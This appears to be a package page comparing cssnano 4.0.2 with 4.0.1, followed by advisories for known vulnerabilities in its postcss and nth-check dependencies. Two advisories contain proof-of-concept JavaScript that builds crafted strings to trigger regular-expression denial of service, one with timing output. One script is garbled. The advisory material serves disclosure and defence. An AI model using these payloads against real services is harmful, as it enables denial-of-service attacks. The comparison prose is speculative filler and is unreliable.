cssnano version 4.0.2 is a minor patch release building upon the stable 4.0.1. Both versions are modular minifiers designed to optimize CSS code, leveraging the PostCSS ecosystem. This means developers can expect robust and customizable CSS minification capabilities. Both versions share identical core dependencies including postcss, cosmiconfig, is-resolvable, and cssnano-preset-default, ensuring consistent handling of PostCSS plugins and configuration loading. Similarly, the development dependencies are the same, featuring tools like webpack, babel-cli, cross-env, babel-core, babel-loader, array-to-sentence, postcss-font-magician, cssnano-preset-advanced, and webpack-bundle-size-analyzer. The key difference lies in a slight adjustment to the unpacked size of the package, with 4.0.2 being marginally larger (25651 bytes) than 4.0.1 (25567 bytes). The newer version was released on July 13, 2018, a couple of days after 4.0.1 which was released on July 11, 2018. This suggests that version 4.0.2 likely addresses bug fixes or minor improvements identified shortly after the initial 4.0.1 release. Developers already using 4.0.1 should upgrade to 4.0.2 to benefit from these refinements resulting on a more polished and stable cssnano and a better CSS minification. Both versions share the same MIT license and repository information, ensuring transparency and open-source accessibility for developers.
All the vulnerabilities related to the version 4.0.2 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms